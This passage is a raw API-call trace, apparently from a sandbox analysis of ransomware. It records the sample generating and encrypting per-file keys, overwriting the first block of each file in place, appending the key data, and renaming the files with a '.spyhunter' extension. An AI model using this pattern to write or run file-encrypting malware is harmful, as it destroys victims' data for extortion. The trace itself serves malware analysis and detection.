0x31f200 [0145.607] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248f160*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248f160*=0x30) returned 1 [0145.607] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile35.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile35.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0145.607] GetProcessHeap () returned 0x2c0000 [0145.608] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0145.608] GetProcessHeap () returned 0x2c0000 [0145.608] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eff568 | out: hHeap=0x2c0000) returned 1 [0145.608] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f160 | out: pbBuffer=0x248f160) returned 1 [0145.608] GetProcessHeap () returned 0x2c0000 [0145.608] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0145.608] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248f158*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248f158*=0x30) returned 1 [0145.608] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile34.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile34.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0145.608] GetProcessHeap () returned 0x2c0000 [0145.608] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0145.608] GetProcessHeap () returned 0x2c0000 [0145.608] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eff470 | out: hHeap=0x2c0000) returned 1 [0145.608] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f160 | out: pbBuffer=0x248f160) returned 1 [0145.608] GetProcessHeap () returned 0x2c0000 [0145.608] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0145.608] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248f158*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248f158*=0x30) returned 1 [0145.608] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile33.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile33.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0145.610] GetProcessHeap () returned 0x2c0000 [0145.610] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0145.610] GetProcessHeap () returned 0x2c0000 [0145.610] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eff378 | out: hHeap=0x2c0000) returned 1 [0145.610] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f158 | out: pbBuffer=0x248f158) returned 1 [0145.610] GetProcessHeap () returned 0x2c0000 [0145.610] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0145.610] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248f150*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248f150*=0x30) returned 1 [0145.610] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile32.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile32.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0145.610] GetProcessHeap () returned 0x2c0000 [0145.610] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0145.610] GetProcessHeap () returned 0x2c0000 [0145.610] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eff280 | out: hHeap=0x2c0000) returned 1 [0145.610] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f158 | out: pbBuffer=0x248f158) returned 1 [0145.610] GetProcessHeap () returned 0x2c0000 [0145.611] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0145.611] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248f150*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248f150*=0x30) returned 1 [0145.611] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile31.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile31.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0145.611] GetProcessHeap () returned 0x2c0000 [0145.611] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0145.611] GetProcessHeap () returned 0x2c0000 [0145.611] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eff188 | out: hHeap=0x2c0000) returned 1 [0145.611] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f150 | out: pbBuffer=0x248f150) returned 1 [0145.611] GetProcessHeap () returned 0x2c0000 [0145.611] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0145.611] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248f148*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248f148*=0x30) returned 1 [0145.611] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile30.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile30.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0145.611] GetProcessHeap () returned 0x2c0000 [0145.611] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0145.611] GetProcessHeap () returned 0x2c0000 [0145.611] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eff090 | out: hHeap=0x2c0000) returned 1 [0145.611] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f150 | out: pbBuffer=0x248f150) returned 1 [0145.611] GetProcessHeap () returned 0x2c0000 [0145.612] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0145.612] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248f148*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248f148*=0x30) returned 1 [0145.612] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile29.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile29.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0145.612] GetProcessHeap () returned 0x2c0000 [0145.612] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0145.612] GetProcessHeap () returned 0x2c0000 [0145.612] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2efef98 | out: hHeap=0x2c0000) returned 1 [0145.612] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f148 | out: pbBuffer=0x248f148) returned 1 [0145.612] GetProcessHeap () returned 0x2c0000 [0145.612] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0145.613] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248f140*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248f140*=0x30) returned 1 [0145.613] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile28.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile28.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0145.613] GetProcessHeap () returned 0x2c0000 [0145.613] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0145.613] GetProcessHeap () returned 0x2c0000 [0145.613] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2efeea0 | out: hHeap=0x2c0000) returned 1 [0145.613] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f148 | out: pbBuffer=0x248f148) returned 1 [0145.613] GetProcessHeap () returned 0x2c0000 [0145.613] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0145.613] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248f140*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248f140*=0x30) returned 1 [0145.613] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile27.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile27.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0145.613] GetProcessHeap () returned 0x2c0000 [0145.613] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0145.613] GetProcessHeap () returned 0x2c0000 [0145.613] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2efeda8 | out: hHeap=0x2c0000) returned 1 [0145.613] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f140 | out: pbBuffer=0x248f140) returned 1 [0145.613] GetProcessHeap () returned 0x2c0000 [0145.613] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0145.613] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248f138*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248f138*=0x30) returned 1 [0145.614] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile26.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile26.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0145.614] GetProcessHeap () returned 0x2c0000 [0145.614] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0145.614] GetProcessHeap () returned 0x2c0000 [0145.614] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2efecb0 | out: hHeap=0x2c0000) returned 1 [0145.614] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f140 | out: pbBuffer=0x248f140) returned 1 [0145.614] GetProcessHeap () returned 0x2c0000 [0145.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0145.614] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248f138*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248f138*=0x30) returned 1 [0145.614] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile25.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile25.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0145.620] GetProcessHeap () returned 0x2c0000 [0145.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0145.620] GetProcessHeap () returned 0x2c0000 [0145.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2efebb8 | out: hHeap=0x2c0000) returned 1 [0145.620] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f138 | out: pbBuffer=0x248f138) returned 1 [0145.620] GetProcessHeap () returned 0x2c0000 [0145.620] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0145.621] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248f130*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248f130*=0x30) returned 1 [0145.621] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile22.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile22.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0145.621] GetProcessHeap () returned 0x2c0000 [0145.621] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0145.621] GetProcessHeap () returned 0x2c0000 [0145.621] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2efe8d0 | out: hHeap=0x2c0000) returned 1 [0145.621] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f138 | out: pbBuffer=0x248f138) returned 1 [0145.621] GetProcessHeap () returned 0x2c0000 [0145.621] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0145.624] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248f130*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248f130*=0x30) returned 1 [0145.624] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile21.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile21.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0145.627] GetProcessHeap () returned 0x2c0000 [0145.627] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0145.627] GetProcessHeap () returned 0x2c0000 [0145.627] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2efe7d8 | out: hHeap=0x2c0000) returned 1 [0145.627] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f130 | out: pbBuffer=0x248f130) returned 1 [0145.627] GetProcessHeap () returned 0x2c0000 [0145.627] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0145.627] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248f128*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248f128*=0x30) returned 1 [0145.627] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile18.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile18.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0145.627] GetProcessHeap () returned 0x2c0000 [0145.627] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0145.627] GetProcessHeap () returned 0x2c0000 [0145.627] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2efe4f0 | out: hHeap=0x2c0000) returned 1 [0145.627] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f130 | out: pbBuffer=0x248f130) returned 1 [0145.627] GetProcessHeap () returned 0x2c0000 [0145.627] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0145.628] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248f128*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248f128*=0x30) returned 1 [0145.628] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile17.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile17.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0145.634] GetProcessHeap () returned 0x2c0000 [0145.634] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0145.634] GetProcessHeap () returned 0x2c0000 [0145.634] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2efe3f8 | out: hHeap=0x2c0000) returned 1 [0145.634] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f128 | out: pbBuffer=0x248f128) returned 1 [0145.634] GetProcessHeap () returned 0x2c0000 [0145.634] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0145.634] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248f120*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248f120*=0x30) returned 1 [0145.634] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile13.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile13.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0145.639] GetProcessHeap () returned 0x2c0000 [0145.639] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0145.639] GetProcessHeap () returned 0x2c0000 [0145.639] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2efe018 | out: hHeap=0x2c0000) returned 1 [0145.639] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f128 | out: pbBuffer=0x248f128) returned 1 [0145.639] GetProcessHeap () returned 0x2c0000 [0145.639] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0145.639] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248f120*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248f120*=0x30) returned 1 [0145.639] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\5p5NrGJn0jS HALPmcxz.dat" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\5p5nrgjn0js halpmcxz.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0145.673] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\5p5NrGJn0jS HALPmcxz.dat") returned 79 [0145.673] StrStrW (lpFirst="5p5NrGJn0jS HALPmcxz.dat", lpSrch=".txt") returned 0x0 [0145.673] GetProcessHeap () returned 0x2c0000 [0145.673] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0145.673] ReadFile (in: hFile=0xb0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f0e4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248f0e4*=0x0, lpOverlapped=0x0) returned 1 [0145.673] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.674] WriteFile (in: hFile=0xb0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x248f0e4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248f0e4*=0x0, lpOverlapped=0x0) returned 1 [0145.674] GetProcessHeap () returned 0x2c0000 [0145.674] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0145.674] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.674] WriteFile (in: hFile=0xb0, lpBuffer=0x248f124*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f0e4, lpOverlapped=0x0 | out: lpBuffer=0x248f124*, lpNumberOfBytesWritten=0x248f0e4*=0x4, lpOverlapped=0x0) returned 1 [0145.675] WriteFile (in: hFile=0xb0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f0e4, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x248f0e4*=0x30, lpOverlapped=0x0) returned 1 [0145.675] CloseHandle (hObject=0xb0) returned 1 [0145.675] GetProcessHeap () returned 0x2c0000 [0145.675] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0145.675] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\5p5NrGJn0jS HALPmcxz.dat.spyhunter") returned 89 [0145.676] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\5p5NrGJn0jS HALPmcxz.dat" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\5p5nrgjn0js halpmcxz.dat"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\5p5NrGJn0jS HALPmcxz.dat.spyhunter" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\5p5nrgjn0js halpmcxz.dat.spyhunter")) returned 1 [0145.676] GetProcessHeap () returned 0x2c0000 [0145.676] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0145.676] GetProcessHeap () returned 0x2c0000 [0145.676] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0145.676] GetProcessHeap () returned 0x2c0000 [0145.676] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f31828 | out: hHeap=0x2c0000) returned 1 [0145.676] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f120 | out: pbBuffer=0x248f120) returned 1 [0145.676] GetProcessHeap () returned 0x2c0000 [0145.677] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0145.677] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248f118*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248f118*=0x30) returned 1 [0145.677] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\VISINTL.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\visintl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0145.677] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\VISINTL.DLL.trx_dll") returned 75 [0145.677] StrStrW (lpFirst="VISINTL.DLL.trx_dll", lpSrch=".txt") returned 0x0 [0145.677] GetProcessHeap () returned 0x2c0000 [0145.677] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0145.677] ReadFile (in: hFile=0xb0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f0dc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248f0dc*=0x2800, lpOverlapped=0x0) returned 1 [0145.779] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0145.779] WriteFile (in: hFile=0xb0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f0dc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248f0dc*=0x2800, lpOverlapped=0x0) returned 1 [0145.779] GetProcessHeap () returned 0x2c0000 [0145.780] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0145.780] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.780] WriteFile (in: hFile=0xb0, lpBuffer=0x248f11c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f0dc, lpOverlapped=0x0 | out: lpBuffer=0x248f11c*, lpNumberOfBytesWritten=0x248f0dc*=0x4, lpOverlapped=0x0) returned 1 [0145.798] WriteFile (in: hFile=0xb0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f0dc, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x248f0dc*=0x30, lpOverlapped=0x0) returned 1 [0145.798] CloseHandle (hObject=0xb0) returned 1 [0145.798] GetProcessHeap () returned 0x2c0000 [0145.798] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0145.798] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\VISINTL.DLL.trx_dll.spyhunter") 